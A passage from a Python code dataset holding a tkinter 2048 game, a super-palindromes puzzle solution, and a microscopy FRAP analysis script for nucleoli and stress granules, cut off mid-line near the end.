main()\r\n","sub_path":"dotmonitor.py","file_name":"dotmonitor.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540792391","text":"from tkinter import *\nfrom random import randint\nimport func\n\n#Настраиваем DEBUG_MODE\nDEBUG_MODE = True\nif DEBUG_MODE:\n\tlog_file = open('log_file.txt', 'w')\n\nprint('LOG FILE (DEBUG_MODE = TRUE)', file = log_file)\n\n# Константы игры\nSIZE_X = 725\nSIZE_Y = 725\nSIZE_CELL = 150\n\n#Открываем окно\nroot = Tk()\nroot.title('2048 Game')\nroot.minsize(SIZE_X, SIZE_Y)\ncanv = Canvas(width = SIZE_X, height = SIZE_Y, bg = 'papaya whip')\ncanv.pack()\n\n#Настройка поля\nfield = []\nfor _ in range(4):\n\tfield.append([None, None, None, None])\nfield[randint(0, 3)][randint(0, 3)] = 2\nrandomX = randint(0, 3)\nrandomY = randint(0, 3)\nwhile field[randomX][randomY] != None:\n\trandomX = randint(0, 3)\n\trandomY = randint(0, 3)\nfield[randomX][randomY] = 2\n\n#Функция для выхода из игры\ndef exit_f():\n\texit(0)\n\n#Функция для вывода поля в лог файл\ndef log_field():\n\tfor row in field:\n\t\tfor element in row:\n\t\t\tprint(element, end = ' ', file = log_file)\n\t\tprint('' , file = log_file)\n\nif DEBUG_MODE:\n\tprint('FIELD GENERATED', file = log_file)\n\tlog_field()\n\n#Функция отрисовки поля\ndef draw_field(field):\n\tfor row in range(len(field)):\n\t\tfor cell in range(len(field[row])):\n\t\t\tif field[row][cell] == None:\n\t\t\t\tcolor = 'cornsilk3'\n\t\t\tif field[row][cell] == 2:\n\t\t\t\tcolor = 'gainsboro'\n\t\t\tif field[row][cell] == 4:\n\t\t\t\tcolor = 'snow2'\n\t\t\tif field[row][cell] == 8:\n\t\t\t\tcolor = 'dark orange'\n\t\t\tif field[row][cell] == 16:\n\t\t\t\tcolor = 'salmon'\n\t\t\tif field[row][cell] == 32:\n\t\t\t\tcolor = 'tomato'\n\t\t\tif field[row][cell] == 64:\n\t\t\t\tcolor = 'red'\n\t\t\tif field[row][cell] == 128:\n\t\t\t\tcolor = 'light goldenrod'\n\t\t\tif field[row][cell] == 256:\n\t\t\t\tcolor = 'gold2'\n\t\t\tif field[row][cell] == 512:\n\t\t\t\tcolor = 'goldenrod1'\n\t\t\tif field[row][cell] == 1024:\n\t\t\t\tcolor = 'tan1'\n\t\t\tif field[row][cell] == 2048:\n\t\t\t\tcolor = 'gold'\n\t\t\tcanv.create_rectangle(25 + cell * 150 + 10 * cell, 25 + row * 150 + 10 * row, 25 + cell * 150 + 150 + 10 * cell, 25 + row * 150 + 150 + 10 * row, fill = color)\n\t\t\tif field[row][cell] != None:\n\t\t\t\tcanv.create_text(25 + cell * 150 + 10 * cell + 75, 25 + row * 150 + 10 * row + 75, font = ('Purisa', 45), text = str(field[row][cell]))\n\n#Спавн новой плитки(2 или 4) после хода\ndef after_move():\n\trandomposX = randint(0, len(field) - 1)\n\trandomposY = randint(0, len(field) - 1)\n\tflag = True\n\tfor i in range(len(field)):\n\t\tfor j in range(len(field)):\n\t\t\tif field[i][j] == None: flag = False\n\tif not flag:\n\t\twhile field[randomposX][randomposY] != None:\n\t\t\trandomposX = randint(0, len(field) - 1)\n\t\t\trandomposY = randint(0, len(field) - 1)\n\t\trandomInt = randint(1, 100)\n\t\t#Шанс спавна 2 - 90%, 4 - 10%\n\t\tif randomInt % 10 == 0:\n\t\t\tfield[randomposX][randomposY] = 4\n\t\telse:\n\t\t\tfield[randomposX][randomposY] = 2\n\t\tif DEBUG_MODE:\n\t\t\tprint(f'SPAWNED NEW TILE {field[randomposX][randomposY]} ON POSITION [{randomposX + 1}, {randomposY + 1}]', file = log_file)\n\t\t\tlog_field()\n\t\tif not func.up_dir(field) and not func.down_dir(field) and not func.left_dir(field) and not func.right_dir(field):\n\t\t\tcanv.delete('all')\n\t\t\tcanv.create_text((360, 360), text = 'You lose')\n\t\t\troot.after(1000, exit_f)\t\t \n\n#Движение вверх\ndef up_dir(event):\n\tprint('UP SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t#Формируем линию которую сдвигаем\n\t\tline = []\n\t\tfor j in range(0, len(field)):\n\t\t\tline.append(field[j][i])\n\t\tline_f = line\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = len(line) - 1\n\t\t#Делаем сдвиг по линии\n\t\twhile el > 0:\n\t\t\tif line[el] == line[el - 1] and line[el] != None:\n\t\t\t\tline[el - 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el - 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel -= 1\n\t\t\tel -= 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.append(None)\n\t\tfor j in range(0, len(field)):\n\t\t\tfield[j][i] = line[j]\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t#Если был хоть один сдвиг, то спавним новую плитку\n\tif flag: after_move()\n\tdraw_field(field)\n\n#Движение вниз\ndef down_dir(event):\n\tprint('DOWN SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\tline = []\n\t\tfor j in range(0, len(field)):\n\t\t\t#Формируем линию которую сдвигаем\n\t\t\tline.append(field[j][i])\n\t\tline_f = line\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = 0\n\t\t#Делаем сдвиг по линии\n\t\twhile el < len(line) - 1:\n\t\t\tif line[el] == line[el + 1] and line[el] != None:\n\t\t\t\tline[el + 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el + 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel += 1\n\t\t\tel += 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.insert(0, None)\n\t\tfor j in range(0, len(field)):\n\t\t\tfield[j][i] = line[j]\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t#Если был хоть один сдвиг, то спавним новую плитку\n\tif flag: after_move()\t\n\tdraw_field(field)\n\n#Движение вправо\ndef right_dir(event):\n\tprint('RIGHT SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t#Формируем линию которую сдвигаем\n\t\tline = field[i]\n\t\tline_f = field[i]\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = 0\n\t\t#Делаем сдвиг по линии\n\t\twhile el < len(line) - 1:\n\t\t\tif line[el] == line[el + 1] and line[el] != None:\n\t\t\t\tline[el + 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el + 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel += 1\n\t\t\tel += 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.insert(0, None)\n\t\tfield[i] = line\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t#Если был хоть один сдвиг, то спавним новую плитку\n\tif flag: after_move()\n\tdraw_field(field)\n\n#Движение влево\ndef left_dir(event):\n\tprint('LEFT SHIFT', file = log_file)\n\tflag = False\n\tfor i in range(len(field)):\n\t\t#Формируем линию которую сдвигаем\n\t\tline = field[i]\n\t\tline_f = field[i]\n\t\tline = list(filter(lambda el : el != None, line))\n\t\tel = len(line) - 1\n\t\t#Делаем сдвиг по линии\n\t\twhile el > 0:\n\t\t\tif line[el] == line[el - 1] and line[el] != None:\n\t\t\t\tline[el - 1] *= 2\n\t\t\t\tline[el] = None\n\t\t\t\tif DEBUG_MODE:\n\t\t\t\t\tprint(f'NEW TILE {line[el - 1]} GENERATED AFTER ADDITION', file = log_file)\n\t\t\t\tel -= 1\n\t\t\tel -= 1\n\t\tline = list(filter(lambda el : el != None, line))\n\t\twhile len(line) < len(field[0]):\n\t\t\tline.append(None)\n\t\tfield[i] = line\n\t\tif line_f != line: flag = True\n\tlog_field()\n\t#Если был хоть один сдвиг, то спавним новую плитку\n\tif flag: after_move()\n\tdraw_field(field)\t\n\n#Отрисовываем поле в начале игры\ndraw_field(field)\n\n#При нажатии на одну из стрелочек вызываем соответствующую функцию\nroot.bind('', up_dir)\nroot.bind('', down_dir)\nroot.bind('', right_dir)\nroot.bind('', left_dir)\nroot.mainloop()\n\nlog_file.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"23975638","text":"import math\n\n\nclass Solution:\n def superpalindromesInRange(self, L, R):\n \"\"\"\n :type L: str\n :type R: str\n :rtype: int\n \"\"\"\n minimum = math.ceil(math.sqrt(int(L)))\n maximum = math.floor(math.sqrt(int(R)))\n minText = str(minimum)\n leftText = minText[:math.ceil(len(minText) / 2)]\n leftNum = int(leftText)\n rightLen = len(minText) - len(leftText)\n supers = []\n while True:\n num = int(leftText + leftText[:rightLen][::-1])\n nextLeftNum = leftNum + 1\n nextLeftText = str(nextLeftNum)\n leftNum, leftText, rightLen = (nextLeftNum, nextLeftText, rightLen) \\\n if len(nextLeftText) == len(leftText) or rightLen == len(leftText) \\\n else (int(nextLeftNum / 10), nextLeftText[:-1], rightLen + 1)\n if num > maximum:\n break\n if num >= minimum and self.isPalindrome(num * num):\n supers.append(num)\n return len(supers)\n\n def isPalindrome(self, num):\n sqText = str(num)\n return sqText == sqText[::-1]\n\n\nsol = Solution()\nret = sol.superpalindromesInRange('1', '1000000000000000000')\nprint(ret)\n","sub_path":"src/super-palindromes.py","file_name":"super-palindromes.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416787771","text":"import numpy as np\nimport pandas as pd\nimport napari\nfrom pycromanager import Bridge\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets\n\nif QtCore.qVersion() >= \"5.\":\n from matplotlib.backends.backend_qt5agg import FigureCanvas\nelse:\n from matplotlib.backends.backend_qt4agg import FigureCanvas\nfrom matplotlib.figure import Figure\nfrom vispy.color import Colormap\nfrom shared.find_organelles import find_organelle, organelle_analysis, find_nuclear_nucleoli, nuclear_analysis\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import medial_axis\nimport shared.analysis as ana\nimport shared.dataframe as dat\nimport shared.display as dis\nimport shared.objects as obj\nimport shared.bleach_points as ble\nimport shared.math_functions as mat\nimport os\n\n\"\"\"\n# ---------------------------------------------------------------------------------------------------\n# FRAP ANALYSIS for NUCLEOLI (SINGLE-FOV)\n# ---------------------------------------------------------------------------------------------------\n\nEXPECTS \n an uManager data (single z, single p),\nSEGMENTS and ANALYZES\n nuclear properties (enables x, y position and number of nucleoli), nucleoli properties (enables \n x, y position, size, mean intensity (without correction), circularity, eccentricity and \n corresponding nuclear index,\nDETECTS and ANALYZES\n bleach spots to measure FRAP curves. Intensities were background and photobleaching corrected and\n normalized based on pre-bleach intensity and minimum intensity, curves were then fitted with \n single exponential function and mobile fraction and t-half were calculated based on fitting,\nEXPORTS \n data.txt: simplified bleach spots related information\n data_full.txt: full bleach spots related information\n data_log.txt: some information during analysis\n data_nuclear.txt: nuclear relevant information\n data_nucleoli.txt: nucleoli relevant information\n data_ctrl.txt: control spots relevant information\n offset_map.pdf: offset map, aim spots (coordinates get from .log file) are centered to (0,0), \n non (0,0) end of the lines indicate location of detected bleach spots relative to aim spots\n raw_intensity.pdf: raw intensity curves of bleach spots, control spots and background and \n background linear fit curve\n pb_factor.pdf: photobleach factor curve and its single exponential decay fit curve\n double_corrected_intensity.pdf: double corrected intensity curves of bleach spots\n normalized_frap_curves.pdf: normalized FRAP curves\n normalized_frap_curves_filtered.pdf: normalized FRAP curves after filtering and their \n corresponding single exponential fitting curves\n frap_curves_filtered_NUMBER.pdf: each single normalized FRAP curve and its corresponding single \n exponential fitting curve\nDISPLAYS \n images (raw image, nuclear, nucleoli, aim spots, color coded bleach spots) in napari, images \n (double corrected intensity curves, normalized filtered FRAP curves and their fitting curves, \n offset map) in matplotlib viewer.\n\n# ----------------------------------\n# PARAMETERS ALLOW CHANGE\n# ----------------------------------\n\n # paths\n data_path: directory of uManager data\n save_path: primary directory for output saving\n\n # values for analysis\n data_c: channel to be analyzed\n pos: position of the given FOV in multi-image dataset, default = 0\n thresholding: global thresholding method used for nucleoli segmentation; only accepts 'na', \n 'otsu', 'yen', 'local-nucleoli' and 'local-sg'\n min_size: the smallest allowable nucleoli size\n max_size: the largest allowable nucleoli size\n num_dilation: number of dilation used to generate bleach spots, determines size of bleach spots\n default = 3\n\n # modes\n mode_bleach_detection: bleach spots detection modes; only accept 'single-raw' or 'single-offset'\n display_mode: displays stitched images in napari or not; only accepts 'N' or 'Y'\n\n\"\"\"\n\n# --------------------------\n# PARAMETERS allow change\n# --------------------------\n# Please changes\ndata_path = \"/Users/xiaoweiyan/Dropbox/LAB/ValeLab/Projects/Blob_bleacher/Data/\"\\\n \"20210203_CBB_nucleoliArsAndHeatshockTreatment/data/WT/C2-Site_15_1\"\nsave_path = \"/Users/xiaoweiyan/Dropbox/LAB/ValeLab/Projects/Blob_bleacher/Data/\"\\\n \"20210203_CBB_nucleoliArsAndHeatshockTreatment/dataAnalysis1/WT/C2-Site_15_1\"\nanalyze_organelle = 'nucleoli' # only accepts 'sg' or 'nucleoli'\nfrap_start_delay = 6 # 50ms default = 4; 100ms default = 5; 200ms default = 6\ndisplay_mode = 'Y' # only accepts 'N' or 'Y'\ndisplay_sort = 'pre_bleach_int' # accepts 'na' or other features like 'sg_size'\ndisplay_data = 'local' # only accepts 'bg' or 'local'\n\n# values for analysis\ndata_c = 0\npos = 0\nnum_dilation = 3 # number of dilation from the coordinate;\n# determines analysis size of the analysis spots; default = 3\n\n# presets\nif analyze_organelle == 'sg':\n thresholding = 'na'\n # global thresholding method; choose in between 'na','otsu','yen', 'local-nucleoli' and 'local-sg'\n min_size = 5 # minimum size; sg default = 5\n max_size = 200 # maximum size; sg default = 200\nelse: # for 'nucleoli'\n thresholding = 'local-nucleoli'\n # global thresholding method; choose in between 'na','otsu','yen', 'local-nucleoli' and 'local-sg'\n min_size = 10 # minimum size; nucleoli default = 10\n max_size = 1000 # maximum size; nucleoli default = 1000;\n # larger ones are generally cells without nucleoli\n\n# modes\nmode_bleach_detection = 'single-offset' # only accepts 'single-raw' or 'single-offset'\nfrap_start_mode = 'min' # only accepts 'delay' or 'min'\nfitting_mode = 'single_exp' # accepts 'single_exp', 'double_exp', 'soumpasis', 'ellenberg', 'optimal'\n\n\"\"\"\n# ---------------------------------------------------------------------------------------------------\n# PLEASE DO NOT CHANGE AFTER THIS\n# ---------------------------------------------------------------------------------------------------\n\"\"\"\n\n# --------------------------\n# LOAD MOVIE\n# --------------------------\nprint(\"### Load movie ...\")\ndata_log = pd.DataFrame({'pos': [pos]})\n\n# build up pycromanager bridge\n# first start up Micro-Manager (needs to be compatible version)\nbridge = Bridge()\nmmc = bridge.get_core()\nmm = bridge.get_studio()\n# load time series data\nstore = mm.data().load_data(data_path, True)\ncb = mm.data().get_coords_builder()\ncb.t(0).p(0).c(0).z(0)\n# get max_t and acquisition time\nmax_t = store.get_max_indices().get_t()\npixels_tseries = dat.get_pixels_tseries(store, cb, data_c)\nacquire_time_tseries, real_time = dat.get_time_tseries(store, cb)\ndata_log['acquire_time'] = [acquire_time_tseries]\ndata_log['real_time'] = [real_time]\n\n# --------------------------------------\n# ORGANELLE ANALYSIS based on time 0\n# --------------------------------------\nprint(\"### Image analysis: %s detection based on time 0 ...\" % analyze_organelle)\n\n# reference image of time 0\n# if decide to use other image as ref_image\n# be sure to check photobleaching correction for all reported intensities\ntemp = store.get_image(cb.c(data_c).t(0).build())\npix = np.reshape(temp.get_raw_pixels(), newshape=[temp.get_height(), temp.get_width()])\n\nif analyze_organelle == 'nucleoli':\n # nuclear detection (currently only doable for nucleoli staining image)\n label_nuclear, _ = find_nuclear_nucleoli(pix)\n data_log['num_nuclei_detected'] = [np.amax(label_nuclear)]\n print(\"Found %d nuclei.\" % data_log['num_nuclei_detected'][0])\n\n# organelle detection\norganelle_before_filter, organelle = find_organelle(pix, thresholding, min_size=min_size, max_size=max_size)\nlabel_organelle = label(organelle, connectivity=1)\ndata_log['num_%s_detected' % analyze_organelle] = [obj.object_count(organelle)]\nprint(\"Found %d %s.\" % (data_log['num_%s_detected' % analyze_organelle][0], analyze_organelle))\n\n# organelle pd dataset\norganelle_pd = organelle_analysis(pix, organelle, '%s' % analyze_organelle, pos)\n\nif analyze_organelle == 'nucleoli':\n # link nucleoli with corresponding nuclear\n round_x = [round(num) for num in organelle_pd['x']]\n round_y = [round(num) for num in organelle_pd['y']]\n organelle_pd['nuclear'] = obj.points_in_objects(label_nuclear, round_y, round_x)\n\n # nuclear pd dataset\n nuclear_pd = nuclear_analysis(label_nuclear, organelle_pd, pos)\n\n # calculate nuclear background intensity\n # calculate nuclear without nucleoli region\n label_nuclear_bg = label_nuclear.copy()\n label_nuclear_bg[organelle_before_filter == 1] = 0\n # get label_nuclear_bg_pd\n label_nuclear_bg_pd = pd.DataFrame(regionprops_table(label_nuclear_bg, properties=['label']))\n label_nuclear_bg_pd['mean_intensity'] = ana.get_intensity(label_nuclear_bg, pixels_tseries)\n # assign nuclear background intensity to corresponding nuclear\n nuclear_pd = dat.copy_based_on_index(nuclear_pd, label_nuclear_bg_pd, 'nuclear', 'label',\n ['nuclear_bg_int'], ['mean_intensity'])\n # assign nuclear background intensity to corresponding nucleoli\n organelle_pd = dat.copy_based_on_index(organelle_pd, nuclear_pd, 'nuclear', 'nuclear',\n ['nuclear_bg_int'], ['nuclear_bg_int'])\n\n data_log['num_nucleoli_in_nuclei'] = [len(organelle_pd[organelle_pd['nuclear'] != 0])]\n print(\"Found %d out of %d nucleoli within nuclei.\" % (data_log['num_nucleoli_in_nuclei'][0],\n obj.object_count(organelle)))\n\n# ----------------------------------\n# BLEACH SPOTS DETECTION\n# ----------------------------------\nprint(\"### Image analysis: bleach spots detection ...\")\n\n# load point_and_shoot log file\nlog_pd = pd.read_csv('%s/PointAndShoot.log' % data_path, na_values=['.'], sep='\\t', header=None)\ndata_log['num_aim_spots'] = [len(log_pd)]\nprint(\"Aim to photobleach %d spots.\" % data_log['num_aim_spots'][0])\nlog_pd.columns = ['time', 'aim_x', 'aim_y'] # reformat log_pd\n\n# get bleach_frame\nlog_pd['bleach_frame'] = dat.get_frame(log_pd['time'], acquire_time_tseries)\n\n# get bleach spot coordinate\ncoordinate_pd = ble.get_bleach_spots_coordinates(log_pd, store, cb, data_c, mode_bleach_detection, frap_start_delay)\nlog_pd = pd.concat([log_pd, coordinate_pd], axis=1)\n\n# link pointer with corresponding organelle\nlog_pd['%s' % analyze_organelle] = obj.points_in_objects(label_organelle, log_pd['x'], log_pd['y'])\n\n# calculate distance to organelle boundary\n_, distance_map = medial_axis(organelle, return_distance=True)\ndistance_lst = []\nfor i in range(len(log_pd)):\n distance_lst.append(distance_map[log_pd['y'][i]][log_pd['x'][i]])\nlog_pd['distance'] = distance_lst\n\n# generate bleach spot mask and bleach spots dataframe (pointer_pd)\nbleach_spots, pointer_pd = ble.get_bleach_spots(log_pd, label_organelle, analyze_organelle, num_dilation)\ndata_log['num_bleach_spots'] = [obj.object_count(bleach_spots)]\nprint(\"%d spots passed filters for analysis.\" % data_log['num_bleach_spots'][0])\n\n# add bleach spots corresponding organelle measurements\npointer_pd = dat.copy_based_on_index(pointer_pd, organelle_pd, '%s' % analyze_organelle, '%s' % analyze_organelle,\n ['%s_x' % analyze_organelle, '%s_y' % analyze_organelle,\n '%s_size' % analyze_organelle, '%s_mean_int' % analyze_organelle,\n '%s_circ' % analyze_organelle],\n ['x', 'y', 'size', 'raw_int', 'circ'])\n\nif analyze_organelle == 'nucleoli':\n pointer_pd = dat.copy_based_on_index(pointer_pd, organelle_pd, 'nucleoli', 'nucleoli',\n ['nuclear', 'nuclear_bg_int'], ['nuclear', 'nuclear_bg_int'])\n\n# --------------------------------------------------\n# FRAP CURVE ANALYSIS from bleach spots\n# --------------------------------------------------\nprint(\"### Image analysis: FRAP curve calculation ...\")\n\n# create control spots mask\nctrl_organelle = ~organelle_pd.index.isin(log_pd['%s' % analyze_organelle].tolist())\nctrl_x = organelle_pd[ctrl_organelle]['x'].astype(int).tolist()\nctrl_y = organelle_pd[ctrl_organelle]['y'].astype(int).tolist()\nctrl_spots = ana.analysis_mask(ctrl_x, ctrl_y, pix, num_dilation)\nnum_ctrl_spots = obj.object_count(ctrl_spots)\npointer_pd['num_ctrl_spots'] = [num_ctrl_spots] * len(pointer_pd)\n\n# get raw intensities for bleach spots and control spots\npointer_pd['raw_int'] = ana.get_intensity(label(bleach_spots, connectivity=1), pixels_tseries)\nctrl_spots_int_tseries = ana.get_intensity(label(ctrl_spots, connectivity=1), pixels_tseries)\nctrl_pd = pd.DataFrame({'pos': [pos] * num_ctrl_spots, 'ctrl_spots': np.arange(0, num_ctrl_spots, 1),\n 'x': ctrl_y, 'y': ctrl_x, 'raw_int': ctrl_spots_int_tseries})\n\n# link ctrl spots with corresponding organelle\nctrl_pd['%s' % analyze_organelle] = obj.points_in_objects(label_organelle, ctrl_pd['x'], ctrl_pd['y'])\nif analyze_organelle == 'nucleoli':\n ctrl_pd = dat.copy_based_on_index(ctrl_pd, organelle_pd, 'nucleoli', 'nucleoli',\n ['nuclear', 'nuclear_bg_int'], ['nuclear', 'nuclear_bg_int'])\n\nprint(\"### Image analysis: background correction ...\")\n# background intensity measurement\nbg_int_tseries = ana.get_bg_int(pixels_tseries)\npointer_pd['bg_int'] = [bg_int_tseries] * len(pointer_pd)\n\n# background intensity fitting\nbg_fit = mat.fitting_linear(np.arange(0, len(bg_int_tseries), 1), bg_int_tseries)\npointer_pd = dat.add_columns(pointer_pd, ['bg_linear_fit', 'bg_linear_r2', 'bg_linear_a', 'bg_linear_b'],\n [[bg_fit[0]] * len(pointer_pd), [bg_fit[1]] * len(pointer_pd),\n [bg_fit[2]] * len(pointer_pd), [bg_fit[3]] * len(pointer_pd)])\n\n# background correction\n# use original measurement if fitting does not exist\nif np.isnan(bg_fit[2]):\n bg = bg_int_tseries\nelse:\n bg = bg_fit[0]\npointer_pd['bg_cor_int'] = ana.bg_correction(pointer_pd['raw_int'], [bg]*len(pointer_pd))\nctrl_pd['bg_cor_int'] = ana.bg_correction(ctrl_pd['raw_int'], [bg]*len(ctrl_pd))\n\nif analyze_organelle == 'nucleoli':\n pointer_nuclear_bg_pd = pointer_pd[pointer_pd['nuclear_bg_int'] != 'na'].copy().reset_index()\n pointer_nuclear_bg_pd['bg_cor_int'] = ana.bg_correction(pointer_nuclear_bg_pd['raw_int'],\n pointer_nuclear_bg_pd['nuclear_bg_int'])\n ctrl_nuclear_bg_pd = ctrl_pd[ctrl_pd['nuclear_bg_int'] != 'na'].copy().reset_index()\n ctrl_nuclear_bg_pd['bg_cor_int'] = ana.bg_correction(ctrl_nuclear_bg_pd['raw_int'],\n ctrl_nuclear_bg_pd['nuclear_bg_int'])\n\n# filter control traces\nctrl_pd_ft = ble.filter_ctrl(ctrl_pd)\npointer_pd['num_ctrl_spots_ft'] = [len(ctrl_pd_ft)] * len(pointer_pd)\ndata_log['num_ctrl_spots'] = len(ctrl_pd_ft)\n\nif analyze_organelle == 'nucleoli':\n ctrl_nuclear_bg_pd_ft = ble.filter_ctrl(ctrl_nuclear_bg_pd)\n pointer_nuclear_bg_pd['num_ctrl_spots_ft'] = [len(ctrl_nuclear_bg_pd_ft)] * len(pointer_nuclear_bg_pd)\n data_log['num_ctrl_spots_nuclear_bg'] = len(ctrl_nuclear_bg_pd_ft)\n\nprint(\"### Image analysis: photobleaching correction ...\")\n# photobleaching factor calculation\nif len(ctrl_pd_ft) != 0:\n pointer_pd = ble.frap_pb_correction(pointer_pd, ctrl_pd_ft)\n # normalize frap curve and measure mobile fraction and t-half based on curve itself\n frap_pd = ble.frap_analysis(pointer_pd, max_t, acquire_time_tseries, real_time, frap_start_delay,\n frap_start_mode)\n pointer_pd = pd.concat([pointer_pd, frap_pd], axis=1)\n\n # frap curve fitting\n print(\"### Imaging analysis: curve fitting ...\")\n pointer_pd = ble.frap_curve_fitting(pointer_pd)\n pointer_pd['pos'] = [pos] * len(pointer_pd)\n pointer_ft_pd = pointer_pd[pointer_pd['frap_filter_%s' % fitting_mode] == 1]\n data_log['num_frap_curves'] = [len(pointer_ft_pd)]\n print(\"%d spots passed filters for FRAP curve quality control.\" % data_log['num_frap_curves'][0])\n\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n storage_path = save_path\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n\n # measurements\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n # full dataset of all bleach spots\n pointer_pd.to_csv('%s/data_full.txt' % storage_path, index=False, sep='\\t')\n # dataset of control spots\n ctrl_pd.to_csv('%s/data_ctrl.txt' % storage_path, index=False, sep='\\t')\n # dataset of organelle\n organelle_pd.to_csv('%s/data_%s.txt' % (storage_path, analyze_organelle), index=False, sep='\\t')\n\n # images\n dis.plot_offset_map(pointer_pd, fitting_mode, 'bg', storage_path) # offset map\n dis.plot_raw_intensity(pointer_pd, ctrl_pd_ft, fitting_mode, 'bg', storage_path) # raw intensity\n dis.plot_pb_factor(pointer_pd, 'bg', storage_path) # photobleaching factor\n dis.plot_corrected_intensity(pointer_pd, fitting_mode, 'bg', storage_path) # intensity after dual correction\n dis.plot_normalized_frap(pointer_pd, fitting_mode, 'bg', storage_path) # normalized FRAP curves\n # normalized FRAP curves after filtering with fitting\n # individual normalized FRAP curves with fitting\n dis.plot_frap_fitting(pointer_pd, fitting_mode, 'bg', storage_path)\n\nelse:\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n storage_path = save_path\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n\nif analyze_organelle == 'nucleoli':\n print(\"### Imaging analysis based on nuclear background: photobleaching correction ...\")\n if len(ctrl_nuclear_bg_pd_ft) != 0:\n pointer_nuclear_bg_pd = ble.frap_pb_correction(pointer_nuclear_bg_pd, ctrl_nuclear_bg_pd_ft)\n # normalize frap curve and measure mobile fraction and t-half based on curve itself\n frap_nuclear_bg_pd = ble.frap_analysis(pointer_nuclear_bg_pd, max_t, acquire_time_tseries, real_time,\n frap_start_delay, frap_start_mode)\n pointer_nuclear_bg_pd = pd.concat([pointer_nuclear_bg_pd, frap_nuclear_bg_pd], axis=1)\n\n # frap curve fitting\n print(\"### Imaging analysis based on nuclear background: curve fitting ...\")\n pointer_nuclear_bg_pd = ble.frap_curve_fitting(pointer_nuclear_bg_pd)\n pointer_nuclear_bg_pd['pos'] = [pos] * len(pointer_nuclear_bg_pd)\n pointer_nuclear_bg_ft_pd = pointer_nuclear_bg_pd[pointer_nuclear_bg_pd['frap_filter_%s' % fitting_mode] == 1]\n data_log['num_frap_curves_nuclear_bg'] = [len(pointer_nuclear_bg_ft_pd)]\n print(\"%d spots passed filters for FRAP curve quality control.\" % data_log['num_frap_curves_nuclear_bg'][0])\n\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n # measurements\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n # dataset of nuclear\n nuclear_pd.to_csv('%s/data_nuclear.txt' % storage_path, index=False, sep='\\t')\n # dataset of nuclear background corrected FRAP data\n pointer_nuclear_bg_pd.to_csv('%s/data_full_nuclear_bg.txt' % storage_path, index=False, sep='\\t')\n\n # images\n dis.plot_offset_map(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path) # offset map\n # raw intensity\n dis.plot_raw_intensity(pointer_nuclear_bg_pd, ctrl_nuclear_bg_pd_ft, fitting_mode, 'nuclear_bg', storage_path)\n dis.plot_pb_factor(pointer_nuclear_bg_pd, 'nuclear_bg', storage_path) # photobleaching factor\n # intensity after dual correction\n dis.plot_corrected_intensity(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n # normalized FRAP curves\n dis.plot_normalized_frap(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n # normalized FRAP curves after filtering with fitting\n # individual normalized FRAP curves with fitting\n dis.plot_frap_fitting(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n\n# --------------------------\n# OUTPUT DISPLAY\n# --------------------------\nif display_mode == 'Y':\n print(\"### Output display ...\")\n\n with napari.gui_qt():\n # embed mpl widget in napari viewer\n mpl_widget = FigureCanvas(Figure(figsize=(5, 3)))\n [ax1, ax2, ax3] = mpl_widget.figure.subplots(nrows=1, ncols=3)\n viewer = napari.Viewer()\n viewer.window.add_dock_widget(mpl_widget)\n\n # napari display\n # Layer1: data\n # display time series movies in napari main viewer\n mov = dis.napari_movie(store, cb)\n viewer.add_image(mov, name='data')\n\n if (analyze_organelle == 'nucleoli') & (np.amax(label_nuclear) > 0):\n # Layer2: nuclear\n # display labeled nuclei\n cmap1 = 'winter'\n cmap1_woBg = dis.num_color_colormap(cmap1, np.amax(label_nuclear))[0]\n viewer.add_image(label_nuclear, name='nuclear', colormap=('winter woBg', cmap1_woBg))\n\n # Layer3: organelle\n # display organelle mask (violet)\n violet_woBg = Colormap([[0.0, 0.0, 0.0, 0.0], [129 / 255, 